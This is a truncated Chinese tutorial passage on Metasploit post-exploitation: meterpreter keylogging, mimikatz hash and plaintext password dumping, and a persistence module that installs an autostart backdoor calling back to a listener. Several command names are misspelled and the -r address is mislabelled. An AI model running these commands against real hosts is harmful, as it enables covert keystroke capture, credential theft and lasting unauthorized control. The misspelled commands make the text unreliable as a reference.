msf进阶
在得到目标机shell后的进阶使用
键盘监听
Keyscan_strat:开启键盘记录功能
Keyscan_dump:显示捕捉到的键盘记录信息
Keyscan_stop:停止键盘记录
获取密码
在mimikatz模块,能获取目标主机的哈希和明文密码,常用命令:
以下均在msfconsole中运行
Load mimikatz:加载mimikatz
Msv:获取hash
Kerberos:获取明文密码
Widigest:获取系统账户信息
msf植入后门
由于meterpreter是仅运行于内存中的shellcode,一旦目标主机重启或更换ip,将失去目标主机的控制权,如果管理人员打上漏洞补丁,二次入侵会变得更加困难
所以metesploit提供了persistence和mstsvc等后渗透模块,通过在目标主机上安装自启动和永久服务的方式长久的控制目标主机
persistence后渗透模块:
通过启动项启动,定期回连、自动运行
Run persistence -S -U -X -i 间隔时间 -p 监听端口号 -r 目标ip地址
mstsvc后渗透攻击模块:
将msf